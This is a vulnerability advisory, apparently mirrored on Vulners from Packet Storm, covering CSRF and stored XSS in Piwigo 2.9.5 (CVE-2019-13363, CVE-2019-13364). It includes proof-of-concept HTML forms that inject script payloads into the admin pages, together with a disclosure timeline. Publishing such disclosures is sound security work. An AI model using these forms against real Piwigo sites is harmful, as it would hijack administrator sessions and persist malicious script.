Lucene search
K

Piwigo 2.9.5 Cross Site Request Forgery / Cross Site Scripting

🗓️ 13 Sep 2019 00:00:00Reported by Rodolfo TavaresType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 283 Views

Piwigo 2.9.5 Cross Site Request Forgery / Cross Site Scripting vulnerability allows injection of javascript code to coerce admin user into unintended action

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Gila CMS 1.11.5 Cross Site Request Forgery / Cross Site Scripting Vulnerabilities
24 Jun 202000:00
zdt
CNVD
Piwigo Cross-Site Scripting Vulnerability (CNVD-2019-31999)
17 Sep 201900:00
cnvd
CNVD
Piwigo Cross-Site Scripting Vulnerability (CNVD-2019-32000)
17 Sep 201900:00
cnvd
CVE
CVE-2019-13363
13 Sep 201912:22
cve
CVE
CVE-2019-13364
13 Sep 201912:24
cve
Cvelist
CVE-2019-13363
13 Sep 201912:22
cvelist
Cvelist
CVE-2019-13364
13 Sep 201912:24
cvelist
EUVD
EUVD-2019-4864
7 Oct 202500:30
euvd
EUVD
EUVD-2019-4865
7 Oct 202500:30
euvd
NVD
CVE-2019-13363
13 Sep 201913:15
nvd
Rows per page
`=====[ Tempest Security Intelligence - ADV-03/2019 ]==========================  
  
Piwigo - Version 2.9.5  
  
Author: Rodolfo Tavares  
  
Tempest Security Intelligence - Recife, Pernambuco - Brazil  
  
=====[ Table of Contents]==================================================  
* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References  
  
=====[ Vulnerability Information]=============================================  
* Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] [CWE-79] Cross-Site Request Forgery (CSRF) [CWE-352]  
* CVSS:6.8.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H  
* CVE-2019-13363, CVE-2019-13364  
  
=====[ Overview]========================================================  
* System affected : Piwigo - Version 2.9.5  
* Software Version : Version 2.9.5 (other versions may also be affected).  
* Impact : Piwigo 2.9.5 is vulnerable to Cross-Site Request Forgery and XSS via /admin.php?page=notification_by_mail&mode=param or /admin.php?page=account_billing. An attacker can exploit this by injecting and persisting javascript code to coerce an admin user into performing unintended actions.  
  
=====[ Detailed description]=================================================  
  
The html codes below exploit vulnerabilities in the same way due to the fact that both forms do not contain CSRF tokens and are vulnerable to XSS attacks. Then an attacker can host these forms on their malicious host and trick an administrator into visiting your page. If successful, the javascript code will be persistently inserted into the administrative configuration pages.  
* [admin.php?page=notification_by_mail&mode=param]  
  
<form action="http://domain.com/admin.php?page=notification_by_mail&mode=param" method="POST">  
  
<input type="hidden" name="nbm_send_html_mail" value="xssaxssa<IMG """><SCRIPT>alert(document.domain)</SCRIPT>"" />  
  
<input type="hidden" name="nbm_send_mail_as" value="xssaxssa<IMG """><SCRIPT>alert(document.domain)</SCRIPT>"" />  
  
<input type="hidden" name="nbm_send_detailed_content" value="xssa" />  
  
<input type="hidden" name="nbm_complementary_mail_content" value="xssa" />  
  
<input type="hidden" name="nbm_send_recent_post_dates" value="xssa" />  
  
<input type="hidden" name="param_submit" value="xssa" />  
* [admin.php?page=account_billing]  
  
<form id="myForm" action="https://pocs.piwigo.com/admin.php?page=account_billing" method="POST">  
  
<input type="hidden" name="vat_number" value="xssa" />  
  
<input type="hidden" name="billing_name" value="xssa"><script>alert(1)</script>" />  
  
<input type="hidden" name="company" value="xssb" />  
  
<input type="hidden" name="billing_address" value="xssc" />  
  
=====[ Timeline of disclosure]===============================================  
  
26/Jun/2019 - Responsible disclosure was initiated with the vendor.  
  
26/Jun/2019 - Piwigo confirmed the issue;  
  
08/Jul/2019 - CVEs was assigned and reserved as CVE-2019-13364 CVE-2019-13363  
  
09/Aug/2019 - The vendor fixed the vulnerability CSRF.  
  
12/Aug/2019 - The vendor fixed the vulnerability XSS.  
  
=====[ Thanks & Acknowledgements]========================================  
* Tempest Security Intelligence [4]  
  
=====[ References ]=====================================================  
  
[1][ https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html]  
  
[2][ https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html]  
  
[3][ https://github.com/Piwigo/Piwigo/issues/1055|https://github.com/Piwigo/Piwigo/issues/1055]  
  
[4][ http://www.tempest.com.br|http://www.tempest.com.br/]  
  
=====[ EOF ]===========================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation